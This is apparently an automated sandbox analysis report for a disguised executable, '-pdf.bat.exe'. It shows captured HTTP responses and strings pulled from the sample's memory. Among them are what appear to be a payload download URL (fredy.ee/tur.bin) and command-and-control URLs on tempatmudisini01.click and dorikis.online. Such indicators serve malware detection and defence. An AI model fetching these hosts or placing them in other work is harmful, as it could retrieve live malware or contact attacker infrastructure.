        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Accept-Ranges: bytes Date: Fri, 04 Oct 2024 06:30:50 GMT X-Varnish: 1110522538 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS Server: C2M Server v1.02 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Accept-Ranges: bytes Date: Fri, 04 Oct 2024 06:30:53 GMT X-Varnish: 1110522577 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS Server: C2M Server v1.02 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Accept-Ranges: bytes Date: Fri, 04 Oct 2024 06:30:55 GMT X-Varnish: 1110522614 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS Server: C2M Server v1.02 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 04 Oct 2024 06:08:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 04 Oct 2024 06:08:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 04 Oct 2024 06:08:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:08:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 
69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 04 Oct 2024 06:08:27 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66b1b463-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 04 Oct 2024 06:08:30 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66b1b463-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 04 Oct 2024 06:08:33 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66b1b463-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 04 Oct 2024 06:08:35 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66b1b463-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 04 Oct 2024 06:08:54 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 04 Oct 2024 06:08:57 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 04 Oct 2024 06:09:00 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 04 Oct 2024 06:09:02 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/7.4.33 | x-litespeed-tag: 894_HTTP.404 | expires: Wed, 11 Jan 1984 05:00:00 GMT | content-type: text/html; charset=UTF-8 | link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/" | x-litespeed-cache-control: no-cache | cache-control: no-cache, no-store, must-revalidate, max-age=0 | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Fri, 04 Oct 2024 06:09:42 GMT | server: LiteSpeed
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/7.4.33 | x-litespeed-tag: 894_HTTP.404 | expires: Wed, 11 Jan 1984 05:00:00 GMT | content-type: text/html; charset=UTF-8 | link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/" | x-litespeed-cache-control: no-cache | cache-control: no-cache, no-store, must-revalidate, max-age=0 | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Fri, 04 Oct 2024 06:09:45 GMT | server: LiteSpeed
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/7.4.33 | x-litespeed-tag: 894_HTTP.404 | expires: Wed, 11 Jan 1984 05:00:00 GMT | content-type: text/html; charset=UTF-8 | link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/" | x-litespeed-cache-control: no-cache | cache-control: no-cache, no-store, must-revalidate, max-age=0 | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Fri, 04 Oct 2024 06:09:48 GMT | server: LiteSpeed
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-encoding: gzip | content-type: text/html | date: Fri, 04 Oct 2024 06:09:57 GMT | etag: W/"66fe0220-2b5" | server: nginx | vary: Accept-Encoding | content-length: 454 | connection: close
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-encoding: gzip | content-type: text/html | date: Fri, 04 Oct 2024 06:10:00 GMT | etag: W/"66fe0220-2b5" | server: nginx | vary: Accept-Encoding | content-length: 454 | connection: close
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-encoding: gzip | content-type: text/html | date: Fri, 04 Oct 2024 06:10:03 GMT | etag: W/"66fe0220-2b5" | server: nginx | vary: Accept-Encoding | content-length: 454 | connection: close
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Fri, 04 Oct 2024 06:10:06 GMT | etag: W/"66fe0220-2b5" | server: nginx | vary: Accept-Encoding | content-length: 693 | connection: close | Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Content-Type: text/html; charset=iso-8859-1
        Content-Length: 282
        Accept-Ranges: bytes
        Date: Fri, 04 Oct 2024 06:34:49 GMT
        X-Varnish: 1110524998
        Age: 0
        Via: 1.1 varnish
        Connection: close
        X-Varnish-Cache: MISS
        Server: C2M Server v1.02
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Content-Type: text/html; charset=iso-8859-1
        Content-Length: 282
        Accept-Ranges: bytes
        Date: Fri, 04 Oct 2024 06:34:52 GMT
        X-Varnish: 1110525052
        Age: 0
        Via: 1.1 varnish
        Connection: close
        X-Varnish-Cache: MISS
        Server: C2M Server v1.02
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Content-Type: text/html; charset=iso-8859-1
        Content-Length: 282
        Accept-Ranges: bytes
        Date: Fri, 04 Oct 2024 06:34:54 GMT
        X-Varnish: 1110525113
        Age: 0
        Via: 1.1 varnish
        Connection: close
        X-Varnish-Cache: MISS
        Server: C2M Server v1.02
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Content-Type: text/html; charset=iso-8859-1
        Content-Length: 282
        Accept-Ranges: bytes
        Date: Fri, 04 Oct 2024 06:34:57 GMT
        X-Varnish: 1110525150
        Age: 0
        Via: 1.1 varnish
        Connection: close
        X-Varnish-Cache: MISS
        Server: C2M Server v1.02
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 04 Oct 2024 06:12:14 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 04 Oct 2024 06:12:17 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 04 Oct 2024 06:12:20 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 04 Oct 2024 06:12:22 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 04 Oct 2024 06:12:28 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66b1b463-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 04 Oct 2024 06:12:31 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66b1b463-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 04 Oct 2024 06:12:34 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66b1b463-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 04 Oct 2024 06:12:36 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66b1b463-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 06:12:55 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 389
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 06:12:58 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 389
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 06:13:00 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 389
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: -pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: -pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38152409772.00000000319C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://fredy.ee/tur.bin
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fredy.ee/tur.binE
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fredy.ee/tur.bint
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: -pdf.bat.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.000000000560C000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.00000000058CC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://tempatmudisini01.click/iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42753648495.000000000107A000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.dorikis.online
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42753648495.000000000107A000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.dorikis.online/d84b/
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000626000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: -pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.00000000005F2000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.00000000005F2000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fredy.ee/
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fredy.ee/tur.bin
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fredy.ee/tur.bint
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: ipconfig.exe, 00000004.00000003.38580690753.0000000003642000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38584047813.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38580912535.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.000000000365E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
        Source: ipconfig.exe, 00000004.00000003.38580690753.0000000003642000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38584047813.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38580912535.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.000000000365E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
        Source: ipconfig.exe, 00000004.00000003.38580690753.0000000003642000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38584047813.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38580912535.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.000000000365E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
        Source: -pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: ipconfig.exe, 00000004.00000003.38580790536.000000000362C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
